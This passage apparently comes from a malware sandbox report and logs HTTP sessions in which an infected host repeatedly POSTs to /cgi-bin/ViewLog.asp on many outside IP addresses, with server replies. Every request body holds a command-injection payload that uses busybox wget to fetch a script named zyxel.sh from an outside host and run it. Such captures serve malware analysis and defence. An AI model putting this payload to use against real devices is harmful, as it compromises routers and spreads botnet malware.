                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:18:19 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              640192.168.2.234866631.136.182.1838080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:44.643316031 CET12856OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:45.640018940 CET12978OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:47.623395920 CET13246OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:51.622906923 CET13786OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:59.557852983 CET14772OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:15.427772045 CET16797OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:48.191462994 CET20662OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              641192.168.2.233637295.197.193.2048080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:45.352392912 CET12975OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:45.732273102 CET13066INHTTP/1.1 403 Forbidden


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              642192.168.2.235026831.25.152.2498080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:45.635360003 CET12977OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:45.940368891 CET13088INHTTP/1.1 404
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Language: en
                                                              Content-Length: 1106
                                                              Date: Mon, 13 Nov 2023 21:19:45 GMT
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 33 39 20 28 55 62 75 6e 74 75 29 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> &#47;cgi-bin&#47;ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.39 (Ubuntu)</h3></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              643192.168.2.234391031.136.46.308080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:45.658265114 CET12978OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:46.663592100 CET13119OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:48.647434950 CET13378OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:52.646733999 CET13913OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:00.581801891 CET14892OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:16.451751947 CET16916OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:48.191410065 CET20661OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              644192.168.2.234049631.136.39.1458080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:45.658835888 CET12979OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:46.663594007 CET13119OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:48.647449970 CET13379OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:52.646744967 CET13913OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:00.581746101 CET14892OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:16.451747894 CET16916OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:48.191416025 CET20662OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              645192.168.2.234836694.122.225.788080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:45.687597990 CET13040OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
